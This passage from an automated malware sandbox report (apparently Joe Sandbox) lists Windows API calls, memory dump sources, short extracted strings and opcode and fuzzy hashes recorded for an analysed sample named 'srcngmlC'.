                                                                                                                                            • Opcode Fuzzy Hash: ead9710df92b5113c5124234150c1c3b6dec9f3ae72a7c1689b76c8026f095cf
                                                                                                                                            • Instruction Fuzzy Hash: F731E0B0D01208DFDB10CF99C985BCEBFF5AB48304F248059E408AB3A4DB74A985CF95
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 360B59F7
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1881234803.00000000360B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 360B0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_360b0000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DuplicateHandle
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3793708945-0
                                                                                                                                            • Opcode ID: b79171a7e36ab9700977669eef552c2f03a35d92c08db7d3a92b9d3e8a0f2dd4
                                                                                                                                            • Instruction ID: e6912987617074e6557d745531df476dfde339b28297f4939eb2f0837b281847
                                                                                                                                            • Opcode Fuzzy Hash: b79171a7e36ab9700977669eef552c2f03a35d92c08db7d3a92b9d3e8a0f2dd4
                                                                                                                                            • Instruction Fuzzy Hash: 3521E5B5900248DFDB10CFAAD984ADEFFF8EB48310F14845AE954A3360D375A940CFA5
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,?,?), ref: 361B072A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1881434210.00000000361B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 361B0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_361b0000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: LibraryLoad
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1029625771-0
                                                                                                                                            • Opcode ID: 55a19bd3c2b87b50a69ce902e4dd59afd77901dce432c46a332d4f931d49d57a
                                                                                                                                            • Instruction ID: 46b364388c657491f7b2f7a61a0d64d034a1152b23b317e7aa8b40d7a25573d8
                                                                                                                                            • Opcode Fuzzy Hash: 55a19bd3c2b87b50a69ce902e4dd59afd77901dce432c46a332d4f931d49d57a
                                                                                                                                            • Instruction Fuzzy Hash: CA2167BAD043498FCB10CFAAD444ADEFBF4EB88360F10842EE559A7210C375A585CFA4
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 360B59F7
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1881234803.00000000360B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 360B0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_360b0000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DuplicateHandle
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3793708945-0
                                                                                                                                            • Opcode ID: d815ad32958cb52fd76f0af4a95acc280657f2eb6a5d642fa3f8d5285f93a716
                                                                                                                                            • Instruction ID: 7f8fea2a304e62d994d8b27b63e6ddc6d7858bdfda0c0263a2d6e60b5f1acb64
                                                                                                                                            • Opcode Fuzzy Hash: d815ad32958cb52fd76f0af4a95acc280657f2eb6a5d642fa3f8d5285f93a716
                                                                                                                                            • Instruction Fuzzy Hash: D021C4B5900258DFDB10CF9AD985ADEBFF8EB48320F14845AE954A7350D374A940CFA5
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 360B8FBB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1881234803.00000000360B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 360B0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_360b0000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: HookWindows
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2559412058-0
                                                                                                                                            • Opcode ID: 7f17bfbfd64e9a99541d59238582d59cfec7cdcae5f855c46340959bf992b941
                                                                                                                                            • Instruction ID: 146c44595e83a06853a51f50d29b8e6fa3bc588847fad8e74ecb682f18a556e1
                                                                                                                                            • Opcode Fuzzy Hash: 7f17bfbfd64e9a99541d59238582d59cfec7cdcae5f855c46340959bf992b941
                                                                                                                                            • Instruction Fuzzy Hash: 462129B5D002099FCB10DF9AD845BDEFBF5EB88320F108429E459A7250C775A940CFA5
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,360B6B15), ref: 360B6B9F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1881234803.00000000360B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 360B0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_360b0000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CallbackDispatcherUser
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2492992576-0
                                                                                                                                            • Opcode ID: 167a1dceea0f21f38a3d43a7862072de4cb171ea74c152f8b02631c3a709acf1
                                                                                                                                            • Instruction ID: 20cd8f1dbfb29d30b42bffabc9964f7eb3d8f544d408720bc3a14fb07e3ed221
                                                                                                                                            • Opcode Fuzzy Hash: 167a1dceea0f21f38a3d43a7862072de4cb171ea74c152f8b02631c3a709acf1
                                                                                                                                            • Instruction Fuzzy Hash: 731167B18043988FCF11DFA9D441BDEBFF4AF49324F10809AD598A7251C674A884CFA9
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 360B8FBB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1881234803.00000000360B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 360B0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_360b0000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: HookWindows
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2559412058-0
                                                                                                                                            • Opcode ID: 73f117eddacc32fc4dfa63e0452067d594dfeedc50cb8f836516bca3600be7ab
                                                                                                                                            • Instruction ID: a79b6114d1d68a3f4673ac58635a6735478532c660ed4ed97ac4b002023fde41
                                                                                                                                            • Opcode Fuzzy Hash: 73f117eddacc32fc4dfa63e0452067d594dfeedc50cb8f836516bca3600be7ab
                                                                                                                                            • Instruction Fuzzy Hash: 2F2108B5D00209DFCB14DF9AC945BDEFBF5EB88310F10842AE459A7260C775A944CFA5
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • VirtualProtect.KERNEL32(?,?,?,?), ref: 31B494D4
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1877095074.0000000031B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 31B40000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_31b40000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ProtectVirtual
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 544645111-0
                                                                                                                                            • Opcode ID: 436f5752cfa673ef7ee9de8b444afd5d71d80cd33648f5506794690449a648e4
                                                                                                                                            • Instruction ID: 73ae27743537dc61aaf631f8093897dd0613ae381a1c43a8501496ac5d14f287
                                                                                                                                            • Opcode Fuzzy Hash: 436f5752cfa673ef7ee9de8b444afd5d71d80cd33648f5506794690449a648e4
                                                                                                                                            • Instruction Fuzzy Hash: 131106B5D002499FDB20DFAAC480ADEFBF4FF48320F10842AE459A7250CB75A944CFA5
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GlobalMemoryStatusEx.KERNEL32 ref: 35C0A6CF
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1880816110.0000000035C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 35C00000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_35c00000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: GlobalMemoryStatus
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1890195054-0
                                                                                                                                            • Opcode ID: 639ec3d60ffa0b4805f0f00b2168b5485b8589650cc8d1f228a8a06644d10dd7
                                                                                                                                            • Instruction ID: b1f34b3f9af7dc5e1652d400834b84458a69df7b8d11367312bb22013cfdb13c
                                                                                                                                            • Opcode Fuzzy Hash: 639ec3d60ffa0b4805f0f00b2168b5485b8589650cc8d1f228a8a06644d10dd7
                                                                                                                                            • Instruction Fuzzy Hash: 7611F0B1C006699FCB10DF9AC945BDEFBF4AF48324F10856AE818A7250D378A944CFA5
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,?,?), ref: 361B072A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1881434210.00000000361B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 361B0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_361b0000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: LibraryLoad
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1029625771-0
                                                                                                                                            • Opcode ID: 4574aa64a336138de4383239e919d63dd132513325a113a1681d8435c1064a62
                                                                                                                                            • Instruction ID: 7cb42cc1b852d6901ac4bb951cab83576c127328c3c428266ddf271e43bf5f03
                                                                                                                                            • Opcode Fuzzy Hash: 4574aa64a336138de4383239e919d63dd132513325a113a1681d8435c1064a62
                                                                                                                                            • Instruction Fuzzy Hash: DC1104BAD002098FDB10CF9AD444ADEFBF8EB48350F10842EE559A7210C375A545CFA5
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • FindCloseChangeNotification.KERNEL32 ref: 31B4969A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1877095074.0000000031B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 31B40000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_31b40000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ChangeCloseFindNotification
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2591292051-0
                                                                                                                                            • Opcode ID: ba6ed3b63733c00533efa6482d271a8cd25f28e89f27abf0898e785759136f29
                                                                                                                                            • Instruction ID: b6cb09ca4bfd0b05d3e542c96dcca9bc2c2085be357132f9ae1d9aeab30d24e9
                                                                                                                                            • Opcode Fuzzy Hash: ba6ed3b63733c00533efa6482d271a8cd25f28e89f27abf0898e785759136f29
                                                                                                                                            • Instruction Fuzzy Hash: 771136B19002588FDB20DFAAC4457DEFFF4EB88324F20842AD459A7250CB79A944CFA5
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 360B1546
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1881234803.00000000360B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 360B0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_360b0000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: HandleModule
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4139908857-0
                                                                                                                                            • Opcode ID: 6ca37c263543c96ad20728603687aa67571d495d0ebb7ea05fb922e7708ab982
                                                                                                                                            • Instruction ID: 434e70c384c80bb6a27569c79605f12ee1c4e2826b3690c7eb6670a00dd9de23
                                                                                                                                            • Opcode Fuzzy Hash: 6ca37c263543c96ad20728603687aa67571d495d0ebb7ea05fb922e7708ab982
                                                                                                                                            • Instruction Fuzzy Hash: A3111FB9C002498FCB10CF9AC441ACEBFF4AB48310F1084AAD85AA7210C379A541CFA5
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 360B1546
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1881234803.00000000360B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 360B0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_360b0000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: HandleModule
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4139908857-0
                                                                                                                                            • Opcode ID: a3d03cc9755cf2839ba670739ca78f75155edd009860517e52aebf63762c2257
                                                                                                                                            • Instruction ID: c2376d1b5e490c6a02b943b80bc91db945b5dff93bba986bf7094beca3ccd69a
                                                                                                                                            • Opcode Fuzzy Hash: a3d03cc9755cf2839ba670739ca78f75155edd009860517e52aebf63762c2257
                                                                                                                                            • Instruction Fuzzy Hash: 7311D2B5C00249CFCB10DF9AD445ADEFFF4AB49310F10C45AD55AA7610C375A545CFA5
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,360B6B15), ref: 360B6B9F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1881234803.00000000360B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 360B0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_360b0000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CallbackDispatcherUser
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2492992576-0
                                                                                                                                            • Opcode ID: 24981e2c0bb9411e88396d1feb99283653293d8b2a8e782b9ca40714f87ae51f
                                                                                                                                            • Instruction ID: 8d8c8f3a5e0e27542cb340898be2aeddcc7892490b0cdb00e9ec0544ac5f9b4b
                                                                                                                                            • Opcode Fuzzy Hash: 24981e2c0bb9411e88396d1feb99283653293d8b2a8e782b9ca40714f87ae51f
                                                                                                                                            • Instruction Fuzzy Hash: 561106B5800248CFCB20DF9AD845BDEFFF4EB49324F20845AE558A7650C775A580CFA5
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,360B6B15), ref: 360B6B9F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1881234803.00000000360B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 360B0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_360b0000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CallbackDispatcherUser
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2492992576-0
                                                                                                                                            • Opcode ID: 2444e8240857ea87100c39919dfb7fe7123ed3c7691fd71e925f2aae3ee21ede
                                                                                                                                            • Instruction ID: 64fc540e34de6cf28ce84362e5e5f780f8e95584c7a9ec87c964889b3bb4f7e2
                                                                                                                                            • Opcode Fuzzy Hash: 2444e8240857ea87100c39919dfb7fe7123ed3c7691fd71e925f2aae3ee21ede
                                                                                                                                            • Instruction Fuzzy Hash: 3011F2B5800249CFDF20DF9AD545B9EBBF4EB48324F20849AE958A7350C774A980CFA5
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0040AF66: _malloc.LIBCMT ref: 0040AF80
                                                                                                                                            • SysAllocString.OLEAUT32 ref: 00401898
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000001.1683699497.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000001.1683699497.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_1_400000_srcngmlC.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocString_malloc
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 959018026-0
                                                                                                                                            • Opcode ID: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                                                                                                            • Instruction ID: c2922591c351a4c461934d9b8210169c8be4224f150a02a6988c85a72df9e820
                                                                                                                                            • Opcode Fuzzy Hash: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                                                                                                            • Instruction Fuzzy Hash: BEF02073501322A7E3316B658841B47B6E8DF80B28F00823FFD44BB391D3B9C85082EA
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • HeapCreate.KERNEL32(00000000,00001000,00000000), ref: 0040D549
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000001.1683699497.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000001.1683699497.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_1_400000_srcngmlC.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateHeap
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 10892065-0
                                                                                                                                            • Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                                                                            • Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
                                                                                                                                            • Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                                                                            • Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: @?T5
                                                                                                                                            • API String ID: 0-486767103
                                                                                                                                            • Opcode ID: 75bfbd1a44e6cb5d04f39d54a6a40c24e672f5abdd8748aaa99758c79fc6532e
                                                                                                                                            • Instruction ID: 273b31778bc3cf84a9cc9fda49877eafab9b0d97db06bf01d06650ed4504abd1
                                                                                                                                            • Opcode Fuzzy Hash: 75bfbd1a44e6cb5d04f39d54a6a40c24e672f5abdd8748aaa99758c79fc6532e
                                                                                                                                            • Instruction Fuzzy Hash: F5816F74B042058FDB44DB69C494B5EB7F3BB88348F119869D40AEB394EF35EC428B81
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: LR^q
                                                                                                                                            • API String ID: 0-2625958711
                                                                                                                                            • Opcode ID: b8f07b8b38a2c4d5143ca2341f50b8fff07a5bd12b88161e77b8abf5b25e7fa8
                                                                                                                                            • Instruction ID: c7f75580455c42e50c93a31f4538e42cc11c2999306c8e20d0dd7bf94bc071a0
                                                                                                                                            • Opcode Fuzzy Hash: b8f07b8b38a2c4d5143ca2341f50b8fff07a5bd12b88161e77b8abf5b25e7fa8
                                                                                                                                            • Instruction Fuzzy Hash: F45180347102548FDB04DB69C558AAE7BF6BF88304F1044A9D406EB3A5CF75EC41CB91
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: PH^q
                                                                                                                                            • API String ID: 0-2549759414
                                                                                                                                            • Opcode ID: dc56bce05a193e39cc59b7053c242f0564dc8fdcc7d00c88fac0d675e670fd41
                                                                                                                                            • Instruction ID: b6af72186dbc6f5c59cbca556854ba122b181877ff410d77eaac72ec64564239
                                                                                                                                            • Opcode Fuzzy Hash: dc56bce05a193e39cc59b7053c242f0564dc8fdcc7d00c88fac0d675e670fd41
                                                                                                                                            • Instruction Fuzzy Hash: 7431D034B002058FDB0A9B34C66466F7BE3AB88254F509868D406EB3A5DF76ED468BD1
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: @?T5
                                                                                                                                            • API String ID: 0-486767103
                                                                                                                                            • Opcode ID: 48919c13c5830c36f1337f792efa34bbd72b729a1870fa6c558225b1641bbdc6
                                                                                                                                            • Instruction ID: 1ce88f66dcf7a20b0b4d4eb6295c3d9b83f151beba4e3673d8d6b49eacad32fb
                                                                                                                                            • Opcode Fuzzy Hash: 48919c13c5830c36f1337f792efa34bbd72b729a1870fa6c558225b1641bbdc6
                                                                                                                                            • Instruction Fuzzy Hash: FF31E474E112499BDB06CF64C55869EBBB3BF85344F94951AE802FB350EF70E846CB90
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: PH^q
                                                                                                                                            • API String ID: 0-2549759414
                                                                                                                                            • Opcode ID: 041003167d4cec043602aedfcd4842ba7b568f3c009c24ee26d1495bbcfe89b6
                                                                                                                                            • Instruction ID: 19ac5befd498536086f006bca9b61959272600efb31050647852d13d4bb6d98a
                                                                                                                                            • Opcode Fuzzy Hash: 041003167d4cec043602aedfcd4842ba7b568f3c009c24ee26d1495bbcfe89b6
                                                                                                                                            • Instruction Fuzzy Hash: 153164347083858FDB068B30C66462E7BF2BF85248F1094A9D406EB3A5DF35ED46CB91
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: @?T5
                                                                                                                                            • API String ID: 0-486767103
                                                                                                                                            • Opcode ID: dc8f1db80793d059b00c6b305514f9bb134768a15978afaaf3eb685fc9d3324e
                                                                                                                                            • Instruction ID: 52aebbc3346ff091f07c34970d08649016d5e234c2cac80e657ca941507005b8
                                                                                                                                            • Opcode Fuzzy Hash: dc8f1db80793d059b00c6b305514f9bb134768a15978afaaf3eb685fc9d3324e
                                                                                                                                            • Instruction Fuzzy Hash: 3B315174F102559BDB05CFA4D49469EB7B3BF89304F54852AE806F7340EF71E8468B90
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: LR^q
                                                                                                                                            • API String ID: 0-2625958711
                                                                                                                                            • Opcode ID: d97a5cb9c603d82973c6b29b0e751433050d33416d99624779095478afcc9460
                                                                                                                                            • Instruction ID: a2b0b0a9e7e0d85175708d7b7ce61f47fdf1f095220769e3a54308cc95df6e4b
                                                                                                                                            • Opcode Fuzzy Hash: d97a5cb9c603d82973c6b29b0e751433050d33416d99624779095478afcc9460
                                                                                                                                            • Instruction Fuzzy Hash: 1C1126357012005FCB059B78D460A9EBBE6FFC5204F1588AAE009DB765EF31EC868BD6
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: ]
                                                                                                                                            • API String ID: 0-3352871620
                                                                                                                                            • Opcode ID: c99dad628cddcb148910507cefe85931c23e4c7f95c9252652f4e8a443bebf6f
                                                                                                                                            • Instruction ID: 1e2a5939cc8337083ae171241bd09f455fa6149f0351bfe10bfd728b4b884d93
                                                                                                                                            • Opcode Fuzzy Hash: c99dad628cddcb148910507cefe85931c23e4c7f95c9252652f4e8a443bebf6f
                                                                                                                                            • Instruction Fuzzy Hash: 811108346592949FCB028F78C85C79A7BF67F86308F855096E845D7352DF34A8078791
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: @?T5
                                                                                                                                            • API String ID: 0-486767103
                                                                                                                                            • Opcode ID: bb5098dc2405f39309c09281cf7624f646d8a005969bc6d8d64af5438771347d
                                                                                                                                            • Instruction ID: e973bc69f65731b62d4d4de8c980aed45e89ea2e50cec83016d13bfa53106cdc
                                                                                                                                            • Opcode Fuzzy Hash: bb5098dc2405f39309c09281cf7624f646d8a005969bc6d8d64af5438771347d
                                                                                                                                            • Instruction Fuzzy Hash: BE012F34B001105BE302967C9855B4AB7DBEBC9718F248C7AE00EE7381EE24EC428396
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: @?T5
                                                                                                                                            • API String ID: 0-486767103
